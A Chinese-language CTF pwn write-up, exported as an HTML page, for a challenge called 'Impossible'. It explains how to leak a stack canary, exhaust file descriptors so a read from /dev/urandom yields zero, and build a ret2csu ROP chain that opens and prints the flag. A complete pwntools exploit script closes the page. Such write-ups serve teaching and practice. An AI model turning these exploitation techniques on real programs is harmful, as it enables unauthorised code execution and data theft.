<!DOCTYPE html>
<html>
<head>
<title>Writeup</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
/* GitHub stylesheet for MarkdownPad (http://markdownpad.com) */
/* Author: Nicolas Hery - http://nicolashery.com */
/* Version: b13fe65ca28d2e568c6ed5d7f06581183df8f2ff */
/* Source: https://github.com/nicolahery/markdownpad-github */

/* RESET
=============================================================================*/

html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video {
  margin: 0;
  padding: 0;
  border: 0;
}

/* BODY
=============================================================================*/

body {
  font-family: Helvetica, arial, freesans, clean, sans-serif;
  font-size: 14px;
  line-height: 1.6;
  color: #333;
  background-color: #fff;
  padding: 20px;
  max-width: 960px;
  margin: 0 auto;
}

body>*:first-child {
  margin-top: 0 !important;
}

body>*:last-child {
  margin-bottom: 0 !important;
}

/* BLOCKS
=============================================================================*/

p, blockquote, ul, ol, dl, table, pre {
  margin: 15px 0;
}

/* HEADERS
=============================================================================*/

h1, h2, h3, h4, h5, h6 {
  margin: 20px 0 10px;
  padding: 0;
  font-weight: bold;
  -webkit-font-smoothing: antialiased;
}

h1 tt, h1 code, h2 tt, h2 code, h3 tt, h3 code, h4 tt, h4 code, h5 tt, h5 code, h6 tt, h6 code {
  font-size: inherit;
}

h1 {
  font-size: 28px;
  color: #000;
}

h2 {
  font-size: 24px;
  border-bottom: 1px solid #ccc;
  color: #000;
}

h3 {
  font-size: 18px;
}

h4 {
  font-size: 16px;
}

h5 {
  font-size: 14px;
}

h6 {
  color: #777;
  font-size: 14px;
}

body>h2:first-child, body>h1:first-child, body>h1:first-child+h2, body>h3:first-child, body>h4:first-child, body>h5:first-child, body>h6:first-child {
  margin-top: 0;
  padding-top: 0;
}

a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
  margin-top: 0;
  padding-top: 0;
}

h1+p, h2+p, h3+p, h4+p, h5+p, h6+p {
  margin-top: 10px;
}

/* LINKS
=============================================================================*/

a {
  color: #4183C4;
  text-decoration: none;
}

a:hover {
  text-decoration: underline;
}

/* LISTS
=============================================================================*/

ul, ol {
  padding-left: 30px;
}

ul li > :first-child, 
ol li > :first-child, 
ul li ul:first-of-type, 
ol li ol:first-of-type, 
ul li ol:first-of-type, 
ol li ul:first-of-type {
  margin-top: 0px;
}

ul ul, ul ol, ol ol, ol ul {
  margin-bottom: 0;
}

dl {
  padding: 0;
}

dl dt {
  font-size: 14px;
  font-weight: bold;
  font-style: italic;
  padding: 0;
  margin: 15px 0 5px;
}

dl dt:first-child {
  padding: 0;
}

dl dt>:first-child {
  margin-top: 0px;
}

dl dt>:last-child {
  margin-bottom: 0px;
}

dl dd {
  margin: 0 0 15px;
  padding: 0 15px;
}

dl dd>:first-child {
  margin-top: 0px;
}

dl dd>:last-child {
  margin-bottom: 0px;
}

/* CODE
=============================================================================*/

pre, code, tt {
  font-size: 12px;
  font-family: Consolas, "Liberation Mono", Courier, monospace;
}

code, tt {
  margin: 0 0px;
  padding: 0px 0px;
  white-space: nowrap;
  border: 1px solid #eaeaea;
  background-color: #f8f8f8;
  border-radius: 3px;
}

pre>code {
  margin: 0;
  padding: 0;
  white-space: pre;
  border: none;
  background: transparent;
}

pre {
  background-color: #f8f8f8;
  border: 1px solid #ccc;
  font-size: 13px;
  line-height: 19px;
  overflow: auto;
  padding: 6px 10px;
  border-radius: 3px;
}

pre code, pre tt {
  background-color: transparent;
  border: none;
}

kbd {
    -moz-border-bottom-colors: none;
    -moz-border-left-colors: none;
    -moz-border-right-colors: none;
    -moz-border-top-colors: none;
    background-color: #DDDDDD;
    background-image: linear-gradient(#F1F1F1, #DDDDDD);
    background-repeat: repeat-x;
    border-color: #DDDDDD #CCCCCC #CCCCCC #DDDDDD;
    border-image: none;
    border-radius: 2px 2px 2px 2px;
    border-style: solid;
    border-width: 1px;
    font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
    line-height: 10px;
    padding: 1px 4px;
}

/* QUOTES
=============================================================================*/

blockquote {
  border-left: 4px solid #DDD;
  padding: 0 15px;
  color: #777;
}

blockquote>:first-child {
  margin-top: 0px;
}

blockquote>:last-child {
  margin-bottom: 0px;
}

/* HORIZONTAL RULES
=============================================================================*/

hr {
  clear: both;
  margin: 15px 0;
  height: 0px;
  overflow: hidden;
  border: none;
  background: transparent;
  border-bottom: 4px solid #ddd;
  padding: 0;
}

/* TABLES
=============================================================================*/

table th {
  font-weight: bold;
}

table th, table td {
  border: 1px solid #ccc;
  padding: 6px 13px;
}

table tr {
  border-top: 1px solid #ccc;
  background-color: #fff;
}

table tr:nth-child(2n) {
  background-color: #f8f8f8;
}

/* IMAGES
=============================================================================*/

img {
  max-width: 100%
}
</style>
<script type="text/javascript" src="directory.js"></script>
<link href="https://cdn.bootcss.com/prettify/r298/prettify.min.css" rel="stylesheet">
<script src="https://cdn.bootcss.com/prettify/r298/prettify.min.js"></script>
<script>
	window.onload = function()
	{
		prettyPrint();
	}
</script>
</head>
<body>
<h1>Pwn</h1>
<h1>Impossible</h1>
<h2>1. 题目分析</h2>
<p>首先上保护机制情况：<br />
<img src="https://raw.githubusercontent.com/fade-vivida/CTF/master/wangdingbei/4/picture/impossibel_protect.jpg" alt="protect" /><br />
可以看到题目开了NX，Full RELRO和Stack Canary。证明无法通过修改GOT得到shell，同时分析题目发现，存在明显的栈溢出漏洞，因此考虑为ret2libc利用方式。  </p>
<h3>1.1 漏洞点1</h3>
<p><img src="https://raw.githubusercontent.com/fade-vivida/CTF/master/wangdingbei/4/picture/vul1.JPG" alt="vul1" /><br />
该函数中存在明显的栈溢出漏洞，但由于canary的存在，需要首先leak canary。而且该函数只能被调用一次，在这考虑使用这一次栈溢出leak canary，再使用其他方法控制程序流。</p>
<h3>1.2 漏洞点2</h3>
<p><img src="https://raw.githubusercontent.com/fade-vivida/CTF/master/wangdingbei/4/picture/vul2.JPG" alt="vul2" /><br />
当输入选择为9011时，会进入上图所示的一个函数中，可以看到该函数功能为每次从&quot;/dev/urandom&quot;文件中读入一个随机数，然后与用户输入的数进行比较，如果相同则可以获取再一次的栈溢出机会（复制内容为另一个函数输入到程序数据段的内容）。  </p>
<p>这里有一个很隐蔽的地方，就是程序在每次打开&quot;/dev/urandom&quot;文件后，并没有使用close函数去关闭文件句柄。因此，如果多次打开该文件，当消耗完当前所设定的最大文件句柄数后，就会打开失败，从而read函数读入的随机数为0.  </p>
<p>在本机环境中使用ulimit -n命令测试文件最大句柄数结果如下图所示：<br />
<img src="https://raw.githubusercontent.com/fade-vivida/CTF/master/wangdingbei/4/picture/max_fileno.JPG" alt="max_fileno" />  </p>
<h2>2. 利用方式</h2>
<h3>2.1 leak canary</h3>
<p>在这里不能直接使用overflow_once函数去leak canary，因为为了防止canary别泄露，canary的最后一个字节总是'\x00'，因此如果想要打印出canary，那么必须将canary的最后一个字节改为非'\x00'的值，但这会触发stack check failed，导致程序直接结束。  </p>
<p>正确的leak方法为，不断调用write_code函数（每次调用该函数会抬高栈帧0x20），因此会将不断canary保留在栈上，经过实际测试，当调用该函数3次后，栈上保留的canary就不会被main函数中的其他函数数据所覆盖，可以正常leak。</p>
<p>canary所在地址偏移计算公式如下所示：<br />
<code>0x110 - 0x8 - 0x20*3 = 0xa8</code><br />
leak结果如下图所示：<br />
<img src="https://raw.githubusercontent.com/fade-vivida/CTF/master/wangdingbei/4/picture/leak_canary.JPG" alt="canary" />  </p>
<h3>2.2 猜测随机数</h3>
<p>这里也是后面通过看其他人的writeup才了解到，linux系统下文件句柄数是有限制的，如果多次打开文件（不关闭）则会导致耗尽文件句柄后，再次打开文件失败。因此可以采用这种方式，打开&quot;/dev/urandom&quot;文件1024次后，耗尽文件句柄数，然后导致下一次打开失败，从而读取到的random为0来再次实现栈溢出。</p>
<p>由于已经存在标准IO（stdin，stdout，stderr）三个文件描述符，因此只要再打开文件1021次，即可耗尽描述符资源。</p>
<h3>2.3 栈溢出利用</h3>
<p>这里有几种思路：<br />
1. 由于该程序的got表不可写，考虑使用dl_resolve去伪造一个system表项，然后让程序重新解析。但在后面具体利用时发现该程序的dynamic节中并没有JMPREL段（考虑可能原因为该程序使用了FULL RELRO技术，因此got表的解析在程序加载时就完成了，所有没有该重定位节），因此该方法不可用。或许可用，伪造该节？<br />
2. 考虑第二种方法，泄露libc地址，然后调用system。但发现该程序在guess_secret函数中，如果猜中随机数，则会关闭标准输入（close(0)），因此该方法不成功。<br />
3. 直接open(&quot;flag&quot;,0)，然后read。</p>
<h2>3.完整exp</h2>
<pre class = "prettyprint lang-javascript">
from pwn import *
from ctypes import *
import os
import roputils as rop
#import roputils as rop

remote_addr = "116.62.152.176"
remote_port = 20001

local_addr = "127.0.0.1"
local_port = 1807

pc = "./pwn"
pwn_elf = ELF(pc)
pwn_rop = rop.ROP(pc)

uselibc = 2 #0 for no,1 for i386,2 for x64
local = 1
haslibc = 1
atta = 1

if uselibc == 2:
	context.arch = "amd64"
else:
	context.arch = "i386"

if uselibc ==2 and haslibc == 0:
	libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
else:
	if uselibc == 1 and haslibc == 0:
		libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
	else:
		libc = ELF('./libc.so.6')

if local == 1:
	if haslibc:
		p = process(pc)
	else:
		p = process(pc)
elif local == 0:
	p = remote(remote_addr,remote_port)
	if haslibc:
		libc = ELF('./libc.so.6')
else:
	p = remote(local_addr,local_port)
	if haslibc:
		libc = ELF('./libc.so.6')

context.log_level = True

if local:
	if atta:
		#gdb.attach(p,'b *0x00000000004009E9\n b*0x0000000000400A6E')
		gdb.attach(p,'b *0x0000000000400C4A\n b *0x0000000000400965')


def sla(a,b):
	p.sendlineafter(a,b)

def sa(a,b):
	p.sendafter(a,b)

def ru(a):
	p.recvuntil(a)

def rv(a):
	return p.recv(a)

def sl(a):
	p.sendline(a)

def lg(s,addr):
	print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))

def func3(content):
	sla('option:','3')
	sa('think?)\n',content)

def write_code(code,s):
	sla('option:','2')
	sla('...\n',code)
	sla('y/n\n',s)

def leak_canary(code):
	sla('option:','1')
	sa('play once..\n',code)
	#sleep(1)

def guess_secret(secret):
	sla('option:',str(9011))
	sa('code:',secret)


def hack():
	raw_input()
	init1 = 0x0000000000400C4A
	init2 = 0x0000000000400C30
	code_base = 0x0000000000602080
	flag_path = code_base + 0x200
	write_addr = code_base + 0x300
	puts_got = pwn_elf.got['puts']
	read_got = pwn_elf.got['read']
	open_got = pwn_elf.got['open']
	#vul_func = 0x0000000000400B15

	# symtab = pwn_rop.dynamic('SYMTAB')
	# strtab = pwn_rop.dynamic('STRTAB')
	# syment = pwn_rop.dynamic('SYMENT')
	# rel_plt = pwn_rop.dynamic('JMPREL')
	# rela_ent = pwn_rop.dynamic('RELAENT')
	# plt_got = pwn_rop.dynamic('PLTGOT')

	write_code('a','n')
	for i in range(2):
		sla('...\n','a')
		sla('y/n\n','n')
	sla('...\n','a')
	sla('y/n\n','y')
	
	leak_canary('a'*(0xa9))
	ru('a'*0xa9)
	canary = u64('\x00' + rv(7))
	lg('canary',canary)

	payload = p64(0) + p64(canary) + p64(0) + p64(init1)
	payload += p64(0) + p64(1) + p64(open_got) + p64(0) + p64(0) + p64(flag_path)
	payload += p64(init2) + p64(0)*7
	payload += p64(init1)
	payload += p64(0) + p64(1) + p64(read_got) + p64(0x100) + p64(write_addr) + p64(0) 
	payload += p64(init2) + p64(0)*7
	payload += p64(init1)
	payload += p64(0) + p64(1) + p64(puts_got) + p64(0) + p64(0) + p64(write_addr)
	payload += p64(init2) + p64(0)*7
	payload += p64(0)
	payload = payload.ljust(0x200,'\x00')
	payload += 'flag\0'
	write_code(payload,'y')

	for i in range(1022):
		guess_secret('\x00'*8)
	
	# ru('mouth...\n')
	# puts_addr = u64(rv(6).ljust(8,'\x00'))
	# libc.address = puts_addr - libc.symbols['puts']
	# system_addr = libc.symbols['system']
	# lg('system',system_addr)

	#sa('code:','\x00'*8)

	p.interactive()
hack()
</pre>

</body>
</html>
<!-- This document was created with MarkdownPad, the Markdown editor for Windows (http://markdownpad.com) -->
